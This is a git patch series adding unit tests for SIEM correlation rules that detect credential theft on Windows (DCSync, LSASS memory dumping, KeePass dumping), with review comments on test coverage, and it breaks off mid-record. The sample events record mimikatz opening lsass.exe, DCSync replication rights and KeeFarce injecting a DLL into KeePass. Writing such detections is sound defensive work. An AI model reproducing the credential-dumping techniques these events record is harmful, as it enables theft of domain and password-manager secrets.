@@ -0,0 +1,4 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\"},\"EventID\":\"4662\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14080\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T19:35:22.922776200Z\"},\"EventRecordID\":\"102112089\",\"Correlation\":{\"ActivityID\":\"{4B14F9AC-0BA9-4809-8483-1083DDB10886}\"},\"Execution\":{\"ProcessID\":\"572\",\"ThreadID\":\"8132\"},\"Channel\":\"Security\",\"Computer\":\"ecsb003006a9.dc.atomic.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-18\"},{\"Name\":\"SubjectUserName\",\"text\":\"ECSB003006A9$\"},{\"Name\":\"SubjectDomainName\",\"text\":\"DC\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x164d623881\"},{\"Name\":\"ObjectServer\",\"text\":\"DS\"},{\"Name\":\"ObjectType\",\"text\":\"%{19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"ObjectName\",\"text\":\"%{b5f76dbe-2a2e-4625-ab2a-66c5d1c71765}\"},{\"Name\":\"OperationType\",\"text\":\"Object Access\"},{\"Name\":\"HandleId\",\"text\":\"0x0\"},{\"Name\":\"AccessList\",\"text\":\"%%7688\"},{\"Name\":\"AccessMask\",\"text\":\"0x100\"},{\"Name\":\"Properties\",\"text\":\"%%7688 {89e95b76-444d-4c62-991a-0facbeda640c} {19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"AdditionalInfo\",\"text\":\"-\"},{\"Name\":\"AdditionalInfo2\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "datafield2": "%%7688 {89e95b76-444d-4c62-991a-0facbeda640c} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.fqdn": "ecsb003006a9.dc.atomic.local", "event_src.host": "ecsb003006a9.dc.atomic.local", "event_src.hostname": "ecsb003006a9", "event_src.subsys": "Security", 
"event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4662_An_operation_was_performed_on_an_object", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4662", "normalized": true, "object": "ds_object", "object.name": "b5f76dbe-2a2e-4625-ab2a-66c5d1c71765", "object.type": "19195a5b-6da0-11d0-afd3-00c04fd930c9", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T20:44:22.248Z", "status": "success", "subject": "account", "subject.account.domain": "dc", "subject.account.id": "S-1-5-18", "subject.account.name": "ecsb003006a9$", "subject.account.session_id": "95787563137", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-05T19:35:22.922Z", "type": "raw", "uuid": "ac227de2-f782-45d9-b886-7dd62483bc2f"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "sync", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: DCSync", "correlation_name": "DCSync", "correlation_type": "incident", "datafield2": "%%7688 {89e95b76-444d-4c62-991a-0facbeda640c} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.host": "ecsb003006a9.dc.atomic.local", "event_src.hostname": "ecsb003006a9", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "DCSync|ecsb003006a9.dc.atomic.local|ecsb003006a9$", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "high", "object": "account", "status": "success", "subject": "account", "subject.account.domain": "dc", "subject.account.id": "S-1-5-18", "subject.account.name": 
"ecsb003006a9$", "subject.account.session_id": "95787563137"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_6.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_6.sc new file mode 100644 index 00000000..edc5c5a7 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_6.sc 
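Review bot: test_5 is the middle record of the same burst as test_4 and test_6 — identical SystemTime 19:35:22.922, the same SubjectLogonId 0x164d623881 and consecutive EventRecordIDs 102112088–102112090 — all generated under S-1-5-18 by the DC's own account `ECSB003006A9$`, which most likely is one replication cycle performed by the DC itself rather than an attacker's replication request. Asserting a separate incident for the Get-Changes-In-Filtered-Set (89e95b76) event of that cycle commits the rule to treating the DC's LocalSystem context as a DCSync source. Either state in the comment that computer accounts are intentionally in scope (`# same DC replication burst as test_4/test_6; computer accounts deliberately not excluded`), or turn these three records into the negative case (`expect 0`) that proves the machine-account exclusion.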
@@ -0,0 +1,4 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\"},\"EventID\":\"4662\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14080\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T19:35:22.922652800Z\"},\"EventRecordID\":\"102112088\",\"Correlation\":{\"ActivityID\":\"{87AC53AA-BE2B-4731-A426-7CB40A54D5A2}\"},\"Execution\":{\"ProcessID\":\"572\",\"ThreadID\":\"8132\"},\"Channel\":\"Security\",\"Computer\":\"ecsb003006a9.dc.atomic.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-18\"},{\"Name\":\"SubjectUserName\",\"text\":\"ECSB003006A9$\"},{\"Name\":\"SubjectDomainName\",\"text\":\"DC\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x164d623881\"},{\"Name\":\"ObjectServer\",\"text\":\"DS\"},{\"Name\":\"ObjectType\",\"text\":\"%{19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"ObjectName\",\"text\":\"%{b5f76dbe-2a2e-4625-ab2a-66c5d1c71765}\"},{\"Name\":\"OperationType\",\"text\":\"Object Access\"},{\"Name\":\"HandleId\",\"text\":\"0x0\"},{\"Name\":\"AccessList\",\"text\":\"%%7688\"},{\"Name\":\"AccessMask\",\"text\":\"0x100\"},{\"Name\":\"Properties\",\"text\":\"%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"AdditionalInfo\",\"text\":\"-\"},{\"Name\":\"AdditionalInfo2\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "datafield2": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.fqdn": "ecsb003006a9.dc.atomic.local", "event_src.host": "ecsb003006a9.dc.atomic.local", "event_src.hostname": "ecsb003006a9", "event_src.subsys": "Security", 
"event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4662_An_operation_was_performed_on_an_object", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4662", "normalized": true, "object": "ds_object", "object.name": "b5f76dbe-2a2e-4625-ab2a-66c5d1c71765", "object.type": "19195a5b-6da0-11d0-afd3-00c04fd930c9", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T20:50:52.204Z", "status": "success", "subject": "account", "subject.account.domain": "dc", "subject.account.id": "S-1-5-18", "subject.account.name": "ecsb003006a9$", "subject.account.session_id": "95787563137", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-05T19:35:22.922Z", "type": "raw", "uuid": "7d3b409a-6aae-4472-a6fd-f8873ac4c0ac"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "sync", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: DCSync", "correlation_name": "DCSync", "correlation_type": "incident", "datafield2": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.host": "ecsb003006a9.dc.atomic.local", "event_src.hostname": "ecsb003006a9", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "DCSync|ecsb003006a9.dc.atomic.local|ecsb003006a9$", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "high", "object": "account", "status": "success", "subject": "account", "subject.account.domain": "dc", "subject.account.id": "S-1-5-18", "subject.account.name": 
"ecsb003006a9$", "subject.account.session_id": "95787563137"} From 14f6eab5ef09cc13c7269d90c7b9195f5114ec57 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Thu, 27 Jul 2023 14:14:37 +0300 Subject: [PATCH 06/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Dump=5Fl?= =?UTF-8?q?sass=5Fvia=5Fprocess=5Faccess)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Dump_lsass_via_process_access/tests/test_1.sc | 3 +++ .../Dump_lsass_via_process_access/tests/test_2.sc | 3 +++ 2 files changed, 6 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Dump_lsass_via_process_access/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Dump_lsass_via_process_access/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Dump_lsass_via_process_access/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Dump_lsass_via_process_access/tests/test_1.sc new file mode 100644 index 00000000..5b725967 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Dump_lsass_via_process_access/tests/test_1.sc 
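Review bot: This case pins an incident on DS-Replication-Get-Changes (1131f6aa) alone, from the DC's machine account `ECSB003006A9$` under S-1-5-18; of the three replication GUIDs covered by these tests it is the one most widely held legitimately, and on its own it is not the right that allows secrets to be replicated (that is Get-Changes-All, 1131f6ad, already covered by test_4). Combined with a computer-account subject this is about the noisiest input one could assert `expect 1` on. If the rule deliberately fires on any of the three rights for any subject, document that here (`# plain Get-Changes by a DC machine account: rule intentionally fires on any replication right`); otherwise consider `expect 0` for this record and keep the 1131f6ad/Administrator case as the positive one.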
@@ -0,0 +1,3 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-17T19:37:11.6619304Z\"},\"EventRecordID\":\"4807\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"344\",\"ThreadID\":\"2032\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"PC04.example.corp\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-03-17 19:37:11.641\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{365abb72-a1e3-5c8e-0000-0010cef72200}\"},{\"Name\":\"SourceProcessId\",\"text\":\"3588\"},{\"Name\":\"SourceThreadId\",\"text\":\"2272\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\mimikatz_trunk\\\\Win32\\\\mimikatz.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{365abb72-0886-5c8f-0000-001030560000}\"},{\"Name\":\"TargetProcessId\",\"text\":\"476\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1010\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+4595c|C:\\\\Windows\\\\system32\\\\KERNELBASE.dll+8185|C:\\\\Users\\\\IEUser\\\\Desktop\\\\mimikatz_trunk\\\\Win32\\\\mimikatz.exe+5c5a9|C:\\\\Users\\\\IEUser\\\\Desktop\\\\mimikatz_trunk\\\\Win32\\\\mimikatz.exe+5c86c|C:\\\\Users\\\\IEUser\\\\Desktop\\\\mimikatz_trunk\\\\Win32\\\\mimikatz.exe+5cbd2|C:\\\\Users\\\\IEUser\\\\Desktop\\\\mimikatz_trunk\\\\Win32\\\\mimikatz.exe+5c4ff|C:\\\\Users\\\\IEUser\\\\Desktop\\\\mimikatz_trunk\\\\Win32\\\\mimikatz.exe+3b3d3\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": 
"2272", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+4595c|C:\\Windows\\system32\\KERNELBASE.dll+8185|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+5c5a9|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+5c86c|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+5cbd2|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+5c4ff|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+3b3d3", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "365abb72-0886-5c8f-0000-001030560000", "object.process.id": "476", "object.process.name": "lsass.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1010", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T16:38:06.331Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\mimikatz_trunk\\win32\\mimikatz.exe", "subject.process.guid": "365abb72-a1e3-5c8e-0000-0010cef72200", "subject.process.id": "3588", "subject.process.name": "mimikatz.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\mimikatz_trunk\\win32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-17T19:37:11.641Z", "type": "raw", "uuid": "1b631cff-9542-4c33-9781-9282db58e8a0"} + +expect 1 {"action": "access", 
"alert.context": "c:\\users\\ieuser\\desktop\\mimikatz_trunk\\win32\\mimikatz.exe -> c:\\windows\\system32\\lsass.exe", "alert.key": "c:\\users\\ieuser\\desktop\\mimikatz_trunk\\win32\\mimikatz.exe -> c:\\windows\\system32\\lsass.exe", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "LSASS Memory", "correlation_name": "Dump_lsass_via_process_access", "correlation_type": "incident", "datafield5": "2272", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+4595c|C:\\Windows\\system32\\KERNELBASE.dll+8185|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+5c5a9|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+5c86c|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+5cbd2|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+5c4ff|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+3b3d3", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Dump_lsass_via_process_access|pc04.example.corp|c:\\users\\ieuser\\desktop\\mimikatz_trunk\\win32\\mimikatz.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "365abb72-0886-5c8f-0000-001030560000", "object.process.id": "476", "object.process.name": "lsass.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1010", "status": "success", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\mimikatz_trunk\\win32\\mimikatz.exe", "subject.process.guid": "365abb72-a1e3-5c8e-0000-0010cef72200", "subject.process.id": "3588", "subject.process.name": "mimikatz.exe", 
"subject.process.path": "c:\\users\\ieuser\\desktop\\mimikatz_trunk\\win32\\"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Dump_lsass_via_process_access/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Dump_lsass_via_process_access/tests/test_2.sc new file mode 100644 index 00000000..b4bc7b29 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Dump_lsass_via_process_access/tests/test_2.sc 
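Review bot: The test pins only the textbook positive — mimikatz.exe opening lsass.exe with GrantedAccess 0x1010 (PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ) — so nothing shows that the rule keys on the access mask rather than on any handle to lsass; a second Sysmon event 10 with a mask lacking VM_READ (e.g. 0x1000, which benign processes commonly request) should carry `expect 0`, since that distinction is what keeps this rule from paging on every security product that queries lsass. The expect block also omits `"subject": "process"` although the input event carries it and the DCSync expects in this series keep `"subject": "account"`; if the harness does subset matching this is harmless, but asserting it costs nothing. The file is also missing its trailing newline (`\ No newline at end of file`), unlike the sibling tests.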
@@ -0,0 +1,3 @@
+{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"1\",\"Level\":\"0\",\"Task\":\"12802\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-09T19:34:19.602076800Z\"},\"EventRecordID\":\"82278\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"408\"},\"Channel\":\"Security\",\"Computer\":\"dc1.lab.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1840087645-2506612525-4240436938-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"admin\"},{\"Name\":\"SubjectDomainName\",\"text\":\"LAB\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x8bcb4\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"Process\"},{\"Name\":\"ObjectName\",\"text\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\lsass.exe\"},{\"Name\":\"HandleId\",\"text\":\"0x314\"},{\"Name\":\"AccessList\",\"text\":\"%%4484\"},{\"Name\":\"AccessMask\",\"text\":\"0x10\"},{\"Name\":\"ProcessId\",\"text\":\"0x50c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\admin\\\\Downloads\\\\mimikatz_trunk\\\\x64\\\\mimikatz.exe\"},{\"Name\":\"ResourceAttributes\",\"text\":\"-\"}]}}}", "category.generic": "Unknown Entity", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x314", "datafield5": "0x10", "event_src.category": "Operating system", "event_src.fqdn": "dc1.lab.local", "event_src.host": "dc1.lab.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4663", "normalized": true, "object": "resource", "object.fullpath": "\\device\\harddiskvolume3\\windows\\system32\\lsass.exe", "object.name": "lsass.exe", "object.path": "\\device\\harddiskvolume3\\windows\\system32\\", "object.property": "GrantedAccess", "object.type": "process", "object.value": "0x10", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T20:02:17.507Z", "status": "success", "subject": "account", "subject.account.domain": "lab", "subject.account.id": "S-1-5-21-1840087645-2506612525-4240436938-1000", "subject.account.name": "admin", "subject.account.privileges": "%%4484", "subject.account.session_id": "572596", "subject.process.fullpath": "C:\\Users\\admin\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe", "subject.process.id": "1292", "subject.process.name": "mimikatz.exe", "subject.process.path": "C:\\Users\\admin\\Downloads\\mimikatz_trunk\\x64\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-09T19:34:19.602Z", "type": "raw", "uuid": "15575de4-d1b2-47f7-bd14-464c4a907e35"}
+
+expect 1 {"action": "access", "alert.context": "lab\\admin: C:\\Users\\admin\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe -> \\device\\harddiskvolume3\\windows\\system32\\lsass.exe", "alert.key": "C:\\Users\\admin\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe -> \\device\\harddiskvolume3\\windows\\system32\\lsass.exe", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "LSASS Memory", "correlation_name": "Dump_lsass_via_process_access", "correlation_type": "incident", "datafield1": "0x314", "datafield5": "0x10", "event_src.category": "Operating system", "event_src.host": "dc1.lab.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Dump_lsass_via_process_access|dc1.lab.local|C:\\Users\\admin\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "resource", "object.fullpath": "\\device\\harddiskvolume3\\windows\\system32\\lsass.exe", "object.name": "lsass.exe", "object.path": "\\device\\harddiskvolume3\\windows\\system32\\", "object.property": "GrantedAccess", "object.type": "process", "object.value": "0x10", "status": "success", "subject": "account", "subject.account.domain": "lab", "subject.account.id": "S-1-5-21-1840087645-2506612525-4240436938-1000", "subject.account.name": "admin", "subject.account.privileges": "%%4484", "subject.account.session_id": "572596", "subject.process.fullpath": "C:\\Users\\admin\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe", "subject.process.id": "1292", "subject.process.name": "mimikatz.exe", "subject.process.path": "C:\\Users\\admin\\Downloads\\mimikatz_trunk\\x64\\"}
\ No newline at end of file
From 40948d72323e5cecfef508305c1a27bac4abd749 Mon Sep 17 00:00:00 2001
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Thu, 27 Jul 2023 14:21:43 +0300
Subject: [PATCH 07/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(KeePass?= =?UTF-8?q?=5FCredDump)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../mitre_attck_cred_access/KeePass_CredDump/tests/test_1.sc | 4 ++++
1 file changed, 4 insertions(+)
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/KeePass_CredDump/tests/test_1.sc
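Review bot: The expected `incident.aggregation.key` on the `expect 1` line keeps the path in its original case, `Dump_lsass_via_process_access|dc1.lab.local|C:\\Users\\admin\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe`, while test_1.sc for the same rule (the preceding hunk) expects the lowercased form `...|c:\\users\\ieuser\\desktop\\mimikatz_trunk\\win32\\mimikatz.exe`; if the rule takes `subject.process.fullpath` as-is, the same binary observed through Sysmon 10 and through 4663 will aggregate into different incidents whenever the two sources differ only in case, which looks like a missing normalization rather than intent. Either the rule should lowercase the path before composing `alert.key` and `incident.aggregation.key`, or this test should carry a comment saying why raw case is the expected output here. The 4663 expectation also omits `event_src.fqdn` although the input event carries it and test_1's expected event keeps it, so confirm that drop is intended. The file is committed without a trailing newline (`\ No newline at end of file`); add one so the next edit does not show the `expect` line as changed.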
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/KeePass_CredDump/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/KeePass_CredDump/tests/test_1.sc
new file mode 100644
index 00000000..b34c9661
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/KeePass_CredDump/tests/test_1.sc
@@ -0,0 +1,4 @@
+{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"8\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"8\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:47:00.0624748Z\"},\"EventRecordID\":\"7023\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1816\",\"ThreadID\":\"1228\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-27 18:47:00.062\"},{\"Name\":\"SourceProcessGuid\",\"text\":\"{365abb72-a3a4-5cc4-0000-001084960c00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"1288\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Users\\\\Public\\\\KeeFarce.exe\"},{\"Name\":\"TargetProcessGuid\",\"text\":\"{365abb72-a201-5cc4-0000-00104f500800}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2364\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Program Files\\\\KeePass Password Safe 2\\\\KeePass.exe\"},{\"Name\":\"NewThreadId\",\"text\":\"1920\"},{\"Name\":\"StartAddress\",\"text\":\"0x5A801260\"},{\"Name\":\"StartModule\",\"text\":\"C:\\\\Users\\\\Public\\\\BootstrapDLL.dll\"},{\"Name\":\"StartFunction\",\"text\":\"LoadManagedProject\"}]}}}", "category.generic": "Thread", "category.high": "Availability Management", "category.low": "Control", "datafield6": "0x5A801260", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_8_Create_remote_thread", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "8", "normalized": true, "object": "thread", "object.fullpath": "c:\\users\\public\\bootstrapdll.dll", "object.id": "1920", "object.name": "BootstrapDLL.dll", "object.path": "c:\\users\\public\\bootstrapdll.dll", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 